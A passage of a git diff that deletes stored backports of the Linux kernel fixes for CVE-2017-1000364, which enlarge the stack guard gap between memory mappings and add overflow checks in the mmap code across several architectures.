-+ unsigned long vm_start = vma->vm_start; -+ -+ if (vma->vm_flags & VM_GROWSDOWN) { -+ vm_start -= stack_guard_gap; -+ if (vm_start > vma->vm_start) -+ vm_start = 0; -+ } -+ return vm_start; -+} -+ -+static inline unsigned long vm_end_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_end = vma->vm_end; -+ -+ if (vma->vm_flags & VM_GROWSUP) { -+ vm_end += stack_guard_gap; -+ if (vm_end < vma->vm_end) -+ vm_end = -PAGE_SIZE; -+ } -+ return vm_end; -+} -+ - static inline unsigned long vma_pages(struct vm_area_struct *vma) - { - return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT; -diff --git a/mm/memory.c b/mm/memory.c -index 0c03425..ed90be3 100644 ---- a/mm/memory.c -+++ b/mm/memory.c -@@ -1478,8 +1478,6 @@ - return alloc_page(GFP_HIGHUSER); - } - --static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr); -- - static bool __need_migrate_cma_page(struct page *page, - struct vm_area_struct *vma, - unsigned long start, unsigned int flags) -@@ -1791,12 +1789,6 @@ - return page; - } - --static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr) --{ -- 
return stack_guard_page_start(vma, addr) || -- stack_guard_page_end(vma, addr+PAGE_SIZE); --} -- - /** - * __get_user_pages() - pin user pages in memory - * @tsk: task_struct of target task -@@ -1977,11 +1969,6 @@ - int ret; - unsigned int fault_flags = 0; - -- /* For mlock, just skip the stack guard page. */ -- if (foll_flags & FOLL_MLOCK) { -- if (stack_guard_page(vma, start)) -- goto next_page; -- } - if (foll_flags & FOLL_WRITE) - fault_flags |= FAULT_FLAG_WRITE; - if (nonblocking) -@@ -3353,40 +3340,6 @@ - } - - /* -- * This is like a special single-page "expand_{down|up}wards()", -- * except we must first make sure that 'address{-|+}PAGE_SIZE' -- * doesn't hit another vma. -- */ --static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address) --{ -- address &= PAGE_MASK; -- if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) { -- struct vm_area_struct *prev = vma->vm_prev; -- -- /* -- * Is there a mapping abutting this one below? -- * -- * That's only ok if it's the same stack mapping -- * that has gotten split.. -- */ -- if (prev && prev->vm_end == address) -- return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM; -- -- return expand_downwards(vma, address - PAGE_SIZE); -- } -- if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) { -- struct vm_area_struct *next = vma->vm_next; -- -- /* As VM_GROWSDOWN but s/below/above/ */ -- if (next && next->vm_start == address + PAGE_SIZE) -- return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM; -- -- return expand_upwards(vma, address + PAGE_SIZE); -- } -- return 0; --} -- --/* - * We enter with non-exclusive mmap_sem (to exclude vma changes, - * but allow concurrent faults), and pte mapped but not yet locked. - * We return with mmap_sem still held, but pte unmapped and unlocked. -@@ -3404,10 +3357,6 @@ - /* File mapping without ->vm_ops ? 
*/ - if (vma->vm_flags & VM_SHARED) - return VM_FAULT_SIGBUS; -- -- /* Check if we need to add a guard page to the stack */ -- if (check_stack_guard_page(vma, address) < 0) -- return VM_FAULT_SIGSEGV; - - /* Use the zero-page for reads */ - if (!(flags & FAULT_FLAG_WRITE)) { -diff --git a/mm/mmap.c b/mm/mmap.c -index 4767b9d..70cf32e 100644 ---- a/mm/mmap.c -+++ b/mm/mmap.c -@@ -275,6 +275,7 @@ - unsigned long rlim, retval; - unsigned long newbrk, oldbrk; - struct mm_struct *mm = current->mm; -+ struct vm_area_struct *next; - unsigned long min_brk; - bool populate; - -@@ -320,7 +321,8 @@ - } - - /* Check against existing mmap mappings. */ -- if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE)) -+ next = find_vma(mm, oldbrk); -+ if (next && newbrk + PAGE_SIZE > vm_start_gap(next)) - goto out; - - /* Ok, looks good - let it rip. */ -@@ -343,10 +345,22 @@ - - static long vma_compute_subtree_gap(struct vm_area_struct *vma) - { -- unsigned long max, subtree_gap; -- max = vma->vm_start; -- if (vma->vm_prev) -- max -= vma->vm_prev->vm_end; -+ unsigned long max, prev_end, subtree_gap; -+ -+ /* -+ * Note: in the rare case of a VM_GROWSDOWN above a VM_GROWSUP, we -+ * allow two stack_guard_gaps between them here, and when choosing -+ * an unmapped area; whereas when expanding we only require one. -+ * That's a little inconsistent, but keeps the code here simpler. 
-+ */ -+ max = vm_start_gap(vma); -+ if (vma->vm_prev) { -+ prev_end = vm_end_gap(vma->vm_prev); -+ if (max > prev_end) -+ max -= prev_end; -+ else -+ max = 0; -+ } - if (vma->vm_rb.rb_left) { - subtree_gap = rb_entry(vma->vm_rb.rb_left, - struct vm_area_struct, vm_rb)->rb_subtree_gap; -@@ -430,7 +444,7 @@ - list_for_each_entry(avc, &vma->anon_vma_chain, same_vma) - anon_vma_interval_tree_verify(avc); - vma_unlock_anon_vma(vma); -- highest_address = vma->vm_end; -+ highest_address = vm_end_gap(vma); - vma = vma->vm_next; - i++; - } -@@ -598,7 +612,7 @@ - if (vma->vm_next) - vma_gap_update(vma->vm_next); - else -- mm->highest_vm_end = vma->vm_end; -+ mm->highest_vm_end = vm_end_gap(vma); - - /* - * vma->vm_prev wasn't known when we followed the rbtree to find the -@@ -847,7 +861,7 @@ - vma_gap_update(vma); - if (end_changed) { - if (!next) -- mm->highest_vm_end = end; -+ mm->highest_vm_end = vm_end_gap(vma); - else if (!adjust_next) - vma_gap_update(next); - } -@@ -890,7 +904,7 @@ - else if (next) - vma_gap_update(next); - else -- mm->highest_vm_end = end; -+ WARN_ON(mm->highest_vm_end != vm_end_gap(vma)); - } - if (insert && file) - uprobe_mmap(insert); -@@ -1691,7 +1705,7 @@ - - while (true) { - /* Visit left subtree if it looks promising */ -- gap_end = vma->vm_start; -+ gap_end = vm_start_gap(vma); - if (gap_end >= low_limit && vma->vm_rb.rb_left) { - struct vm_area_struct *left = - rb_entry(vma->vm_rb.rb_left, -@@ -1702,7 +1716,7 @@ - } - } - -- gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0; -+ gap_start = vma->vm_prev ? 
vm_end_gap(vma->vm_prev) : 0; - check_current: - /* Check if current node has a suitable gap */ - if (gap_start > high_limit) -@@ -1729,8 +1743,8 @@ - vma = rb_entry(rb_parent(prev), - struct vm_area_struct, vm_rb); - if (prev == vma->vm_rb.rb_left) { -- gap_start = vma->vm_prev->vm_end; -- gap_end = vma->vm_start; -+ gap_start = vm_end_gap(vma->vm_prev); -+ gap_end = vm_start_gap(vma); - goto check_current; - } - } -@@ -1794,7 +1808,7 @@ - - while (true) { - /* Visit right subtree if it looks promising */ -- gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0; -+ gap_start = vma->vm_prev ? vm_end_gap(vma->vm_prev) : 0; - if (gap_start <= high_limit && vma->vm_rb.rb_right) { - struct vm_area_struct *right = - rb_entry(vma->vm_rb.rb_right, -@@ -1807,7 +1821,7 @@ - - check_current: - /* Check if current node has a suitable gap */ -- gap_end = vma->vm_start; -+ gap_end = vm_start_gap(vma); - if (gap_end < low_limit) - return -ENOMEM; - if (gap_start <= high_limit && gap_end - gap_start >= length) -@@ -1833,7 +1847,7 @@ - struct vm_area_struct, vm_rb); - if (prev == vma->vm_rb.rb_right) { - gap_start = vma->vm_prev ? 
-- vma->vm_prev->vm_end : 0; -+ vm_end_gap(vma->vm_prev) : 0; - goto check_current; - } - } -@@ -1871,7 +1885,7 @@ - unsigned long len, unsigned long pgoff, unsigned long flags) - { - struct mm_struct *mm = current->mm; -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct vm_unmapped_area_info info; - - if (len > TASK_SIZE - mmap_min_addr) { -@@ -1887,9 +1901,10 @@ - - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && addr >= mmap_min_addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - -@@ -1920,7 +1935,7 @@ - const unsigned long len, const unsigned long pgoff, - const unsigned long flags) - { -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct mm_struct *mm = current->mm; - unsigned long addr = addr0; - struct vm_unmapped_area_info info; -@@ -1941,9 +1956,10 @@ - /* requesting a specific address */ - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && addr >= mmap_min_addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - -@@ -2076,21 +2092,19 @@ - * update accounting. This is shared with both the - * grow-up and grow-down cases. 
- */ --static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, unsigned long grow) -+static int acct_stack_growth(struct vm_area_struct *vma, -+ unsigned long size, unsigned long grow) - { - struct mm_struct *mm = vma->vm_mm; - struct rlimit *rlim = current->signal->rlim; -- unsigned long new_start, actual_size; -+ unsigned long new_start; - - /* address space limit tests */ - if (!may_expand_vm(mm, grow)) - return -ENOMEM; - - /* Stack limit test */ -- actual_size = size; -- if (size && (vma->vm_flags & (VM_GROWSUP | VM_GROWSDOWN))) -- actual_size -= PAGE_SIZE; -- if (actual_size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur)) -+ if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur)) - return -ENOMEM; - - /* mlock limit tests */ -@@ -2131,32 +2145,40 @@ - */ - int expand_upwards(struct vm_area_struct *vma, unsigned long address) - { -- int error; -+ struct vm_area_struct *next; -+ unsigned long gap_addr; -+ int error = 0; - - if (!(vma->vm_flags & VM_GROWSUP)) - return -EFAULT; - -- /* -- * We must make sure the anon_vma is allocated -- * so that the anon_vma locking is not a noop. -- */ -+ /* Guard against wrapping around to address 0. */ -+ address &= PAGE_MASK; -+ address += PAGE_SIZE; -+ if (!address) -+ return -ENOMEM; -+ -+ /* Enforce stack_guard_gap */ -+ gap_addr = address + stack_guard_gap; -+ if (gap_addr < address) -+ return -ENOMEM; -+ next = vma->vm_next; -+ if (next && next->vm_start < gap_addr) { -+ if (!(next->vm_flags & VM_GROWSUP)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ -+ /* We must make sure the anon_vma is allocated. */ - if (unlikely(anon_vma_prepare(vma))) - return -ENOMEM; -- vma_lock_anon_vma(vma); - - /* - * vma->vm_start/vm_end cannot change under us because the caller - * is required to hold the mmap_sem in read mode. We need the - * anon_vma lock to serialize against concurrent expand_stacks. -- * Also guard against wrapping around to address 0. 
- */ -- if (address < PAGE_ALIGN(address+4)) -- address = PAGE_ALIGN(address+4); -- else { -- vma_unlock_anon_vma(vma); -- return -ENOMEM; -- } -- error = 0; -+ vma_lock_anon_vma(vma); - - /* Somebody else might have raced and expanded it already */ - if (address > vma->vm_end) { -@@ -2187,7 +2209,7 @@ - if (vma->vm_next) - vma_gap_update(vma->vm_next); - else -- vma->vm_mm->highest_vm_end = address; -+ vma->vm_mm->highest_vm_end = vm_end_gap(vma); - spin_unlock(&vma->vm_mm->page_table_lock); - - perf_event_mmap(vma); -@@ -2207,27 +2229,36 @@ - int expand_downwards(struct vm_area_struct *vma, - unsigned long address) - { -+ struct vm_area_struct *prev; -+ unsigned long gap_addr; - int error; -- -- /* -- * We must make sure the anon_vma is allocated -- * so that the anon_vma locking is not a noop. -- */ -- if (unlikely(anon_vma_prepare(vma))) -- return -ENOMEM; - - address &= PAGE_MASK; - error = security_mmap_addr(address); - if (error) - return error; - -- vma_lock_anon_vma(vma); -+ /* Enforce stack_guard_gap */ -+ gap_addr = address - stack_guard_gap; -+ if (gap_addr > address) -+ return -ENOMEM; -+ prev = vma->vm_prev; -+ if (prev && prev->vm_end > gap_addr) { -+ if (!(prev->vm_flags & VM_GROWSDOWN)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ -+ /* We must make sure the anon_vma is allocated. */ -+ if (unlikely(anon_vma_prepare(vma))) -+ return -ENOMEM; - - /* - * vma->vm_start/vm_end cannot change under us because the caller - * is required to hold the mmap_sem in read mode. We need the - * anon_vma lock to serialize against concurrent expand_stacks. - */ -+ vma_lock_anon_vma(vma); - - /* Somebody else might have raced and expanded it already */ - if (address < vma->vm_start) { -@@ -2269,28 +2300,25 @@ - return error; - } - --/* -- * Note how expand_stack() refuses to expand the stack all the way to -- * abut the next virtual mapping, *unless* that mapping itself is also -- * a stack mapping. 
We want to leave room for a guard page, after all -- * (the guard page itself is not added here, that is done by the -- * actual page faulting logic) -- * -- * This matches the behavior of the guard page logic (see mm/memory.c: -- * check_stack_guard_page()), which only allows the guard page to be -- * removed under these circumstances. -- */ -+/* enforced gap between the expanding stack and other mappings. */ -+unsigned long stack_guard_gap = 256UL< -Debugged-by: Linus Torvalds -Signed-off-by: Hugh Dickins -Acked-by: Michal Hocko -Signed-off-by: Linus Torvalds -Signed-off-by: Greg Kroah-Hartman ---- - -diff --git a/mm/mmap.c b/mm/mmap.c -index 70cf32e..b6ad709 100644 ---- a/mm/mmap.c -+++ b/mm/mmap.c -@@ -1721,7 +1721,8 @@ - /* Check if current node has a suitable gap */ - if (gap_start > high_limit) - return -ENOMEM; -- if (gap_end >= low_limit && gap_end - gap_start >= length) -+ if (gap_end >= low_limit && -+ gap_end > gap_start && gap_end - gap_start >= length) - goto found; - - /* Visit right subtree if it looks promising */ -@@ -1824,7 +1825,8 @@ - gap_end = vm_start_gap(vma); - if (gap_end < low_limit) - return -ENOMEM; -- if (gap_start <= high_limit && gap_end - gap_start >= length) -+ if (gap_start <= high_limit && -+ gap_end > gap_start && gap_end - gap_start >= length) - goto found; - - /* Visit left subtree if it looks promising */ diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch.base64 deleted file mode 100644 index c21c7c63..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0006.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch deleted file mode 100644 index 3c057152..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch +++ /dev/null 
@@ -1,47 +0,0 @@
-From 1b92e2fd0b29a21ef3a6a5cd80328730aa6a4bc6 Mon Sep 17 00:00:00 2001
-From: Helge Deller
-Date: Mon, 19 Jun 2017 17:34:05 +0200
-Subject: [PATCH] Allow stack to grow up to address space limit
-
-commit bd726c90b6b8ce87602208701b208a208e6d5600 upstream.
-
-Fix expand_upwards() on architectures with an upward-growing stack (parisc,
-metag and partly IA-64) to allow the stack to reliably grow exactly up to
-the address space limit given by TASK_SIZE.
-
-Change-Id: I911e49b27d519aae257bf57cadff303e25872a14
-Signed-off-by: Helge Deller
-Acked-by: Hugh Dickins
-Signed-off-by: Linus Torvalds
-Signed-off-by: Willy Tarreau
----
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index b6ad709..fa6f890 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -2154,16 +2154,19 @@
- if (!(vma->vm_flags & VM_GROWSUP))
- return -EFAULT;
-
-- /* Guard against wrapping around to address 0. */
-+ /* Guard against exceeding limits of the address space. */
- address &= PAGE_MASK;
-- address += PAGE_SIZE;
-- if (!address)
-+ if (address >= TASK_SIZE)
- return -ENOMEM;
-+ address += PAGE_SIZE;
-
- /* Enforce stack_guard_gap */
- gap_addr = address + stack_guard_gap;
-- if (gap_addr < address)
-- return -ENOMEM;
-+
-+ /* Guard against overflow */
-+ if (gap_addr < address || gap_addr > TASK_SIZE)
-+ gap_addr = TASK_SIZE;
-+
- next = vma->vm_next;
- if (next && next->vm_start < gap_addr) {
- if (!(next->vm_flags & VM_GROWSUP))
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch.base64
deleted file mode 100644
index 21e7141a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0007.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0008.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0008.patch
deleted file mode 100644
index 88454e1f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0008.patch
+++ /dev/null
@@ -1,874 +0,0 @@
-From d4712eb79b17d85c9e354efa2d3156ce50736128 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins
-Date: Mon, 19 Jun 2017 04:03:24 -0700
-Subject: mm: larger stack guard gap, between vmas
-
-commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream.
-
-Stack guard page is a useful feature to reduce a risk of stack smashing
-into a different mapping. We have been using a single page gap which
-is sufficient to prevent having stack adjacent to a different mapping.
-But this seems to be insufficient in the light of the stack usage in
-userspace. E.g. glibc uses as large as 64kB alloca() in many commonly
-used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX]
-which is 256kB or stack strings with MAX_ARG_STRLEN.
-
-This will become especially dangerous for suid binaries and the default
-no limit for the stack size limit because those applications can be
-tricked to consume a large portion of the stack and a single glibc call
-could jump over the guard page. These attacks are not theoretical,
-unfortunatelly.
-
-Make those attacks less probable by increasing the stack guard gap
-to 1MB (on systems with 4k pages; but make it depend on the page size
-because systems with larger base pages might cap stack allocations in
-the PAGE_SIZE units) which should cover larger alloca() and VLA stack
-allocations. It is obviously not a full fix because the problem is
-somehow inherent, but it should reduce attack space a lot.
-
-One could argue that the gap size should be configurable from userspace,
-but that can be done later when somebody finds that the new 1MB is wrong
-for some special case applications. For now, add a kernel command line
-option (stack_guard_gap) to specify the stack gap size (in page units).
- -Implementation wise, first delete all the old code for stack guard page: -because although we could get away with accounting one extra page in a -stack vma, accounting a larger gap can break userspace - case in point, -a program run with "ulimit -S -v 20000" failed when the 1MB gap was -counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK -and strict non-overcommit mode. - -Instead of keeping gap inside the stack vma, maintain the stack guard -gap as a gap between vmas: using vm_start_gap() in place of vm_start -(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few -places which need to respect the gap - mainly arch_get_unmapped_area(), -and and the vma tree's subtree_gap support for that. - -Original-patch-by: Oleg Nesterov -Original-patch-by: Michal Hocko -Signed-off-by: Hugh Dickins -Acked-by: Michal Hocko -Tested-by: Helge Deller # parisc -Signed-off-by: Linus Torvalds -[wt: backport to 4.11: adjust context] -[wt: backport to 4.9: adjust context ; kernel doc was not in admin-guide] -[wt: backport to 4.4: adjust context ; drop ppc hugetlb_radix changes] -[wt: backport to 3.18: adjust context ; no FOLL_POPULATE ; - s390 uses generic arch_get_unmapped_area()] -Signed-off-by: Willy Tarreau -[gkh: minor build fixes for 3.18] -Signed-off-by: Greg Kroah-Hartman ---- - Documentation/kernel-parameters.txt | 7 ++ - arch/arc/mm/mmap.c | 2 +- - arch/arm/mm/mmap.c | 4 +- - arch/frv/mm/elf-fdpic.c | 2 +- - arch/mips/mm/mmap.c | 2 +- - arch/parisc/kernel/sys_parisc.c | 15 ++-- - arch/powerpc/mm/slice.c | 2 +- - arch/sh/mm/mmap.c | 4 +- - arch/sparc/kernel/sys_sparc_64.c | 4 +- - arch/sparc/mm/hugetlbpage.c | 2 +- - arch/tile/mm/hugetlbpage.c | 2 +- - arch/x86/kernel/sys_x86_64.c | 4 +- - arch/x86/mm/hugetlbpage.c | 2 +- - arch/xtensa/kernel/syscall.c | 2 +- - fs/hugetlbfs/inode.c | 2 +- - fs/proc/task_mmu.c | 4 - - include/linux/mm.h | 53 ++++++------- - mm/gup.c | 5 -- - mm/memory.c | 38 --------- - mm/mmap.c | 149 
+++++++++++++++++++++--------------- - 20 files changed, 147 insertions(+), 158 deletions(-) - -diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt -index b2bdea19..9abe552 100644 ---- a/Documentation/kernel-parameters.txt -+++ b/Documentation/kernel-parameters.txt -@@ -3324,6 +3324,13 @@ bytes respectively. Such letter suffixes can also be entirely omitted. - spia_pedr= - spia_peddr= - -+ stack_guard_gap= [MM] -+ override the default stack gap protection. The value -+ is in page units and it defines how many pages prior -+ to (for stacks growing down) resp. after (for stacks -+ growing up) the main stack are reserved for no other -+ mapping. Default value is 256 pages. -+ - stacktrace [FTRACE] - Enabled the stack tracer on boot up. - -diff --git a/arch/arc/mm/mmap.c b/arch/arc/mm/mmap.c -index 2e06d56..cf4ae69 100644 ---- a/arch/arc/mm/mmap.c -+++ b/arch/arc/mm/mmap.c -@@ -64,7 +64,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c -index 5e85ed3..8f9d1cf 100644 ---- a/arch/arm/mm/mmap.c -+++ b/arch/arm/mm/mmap.c -@@ -89,7 +89,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -140,7 +140,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c -index 836f1470..efa59f1 100644 ---- a/arch/frv/mm/elf-fdpic.c -+++ 
b/arch/frv/mm/elf-fdpic.c -@@ -74,7 +74,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi - addr = PAGE_ALIGN(addr); - vma = find_vma(current->mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - goto success; - } - -diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c -index f1baadd..9be924f 100644 ---- a/arch/mips/mm/mmap.c -+++ b/arch/mips/mm/mmap.c -@@ -92,7 +92,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp, - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c -index 5aba01a..4dda73c 100644 ---- a/arch/parisc/kernel/sys_parisc.c -+++ b/arch/parisc/kernel/sys_parisc.c -@@ -88,7 +88,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, - unsigned long len, unsigned long pgoff, unsigned long flags) - { - struct mm_struct *mm = current->mm; -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - unsigned long task_size = TASK_SIZE; - int do_color_align, last_mmap; - struct vm_unmapped_area_info info; -@@ -115,9 +115,10 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, - else - addr = PAGE_ALIGN(addr); - -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - goto found_addr; - } - -@@ -141,7 +142,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - const unsigned long len, const unsigned long pgoff, - const unsigned long flags) - { -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct mm_struct *mm = current->mm; - unsigned 
long addr = addr0; - int do_color_align, last_mmap; -@@ -175,9 +176,11 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - addr = COLOR_ALIGN(addr, last_mmap, pgoff); - else - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - goto found_addr; - } - -diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c -index ded0ea1..4c14626 100644 ---- a/arch/powerpc/mm/slice.c -+++ b/arch/powerpc/mm/slice.c -@@ -105,7 +105,7 @@ static int slice_area_is_free(struct mm_struct *mm, unsigned long addr, - if ((mm->task_size - len) < addr) - return 0; - vma = find_vma(mm, addr); -- return (!vma || (addr + len) <= vma->vm_start); -+ return (!vma || (addr + len) <= vm_start_gap(vma)); - } - - static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice) -diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c -index 6777177..7df7d59 100644 ---- a/arch/sh/mm/mmap.c -+++ b/arch/sh/mm/mmap.c -@@ -63,7 +63,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -113,7 +113,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c -index c690c8e..7f0f7c01 100644 ---- a/arch/sparc/kernel/sys_sparc_64.c -+++ b/arch/sparc/kernel/sys_sparc_64.c -@@ -118,7 +118,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi - - vma = find_vma(mm, addr); 
- if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -181,7 +181,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - - vma = find_vma(mm, addr); - if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c -index 4242eab..2b6fae6 100644 ---- a/arch/sparc/mm/hugetlbpage.c -+++ b/arch/sparc/mm/hugetlbpage.c -@@ -115,7 +115,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr, - addr = ALIGN(addr, HPAGE_SIZE); - vma = find_vma(mm, addr); - if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c -index 8a00c7b..52deac2 100644 ---- a/arch/tile/mm/hugetlbpage.c -+++ b/arch/tile/mm/hugetlbpage.c -@@ -237,7 +237,7 @@ unsigned long hugetlb_get_unmapped_area(struct file *file, unsigned long addr, - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (current->mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c -index 30277e2..d050393 100644 ---- a/arch/x86/kernel/sys_x86_64.c -+++ b/arch/x86/kernel/sys_x86_64.c -@@ -127,7 +127,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (end - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -166,7 +166,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const 
unsigned long addr0, - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c -index 9161f76..c504866 100644 ---- a/arch/x86/mm/hugetlbpage.c -+++ b/arch/x86/mm/hugetlbpage.c -@@ -144,7 +144,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr, - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/arch/xtensa/kernel/syscall.c b/arch/xtensa/kernel/syscall.c -index 5d3f7a1..1ff0b92 100644 ---- a/arch/xtensa/kernel/syscall.c -+++ b/arch/xtensa/kernel/syscall.c -@@ -86,7 +86,7 @@ unsigned long 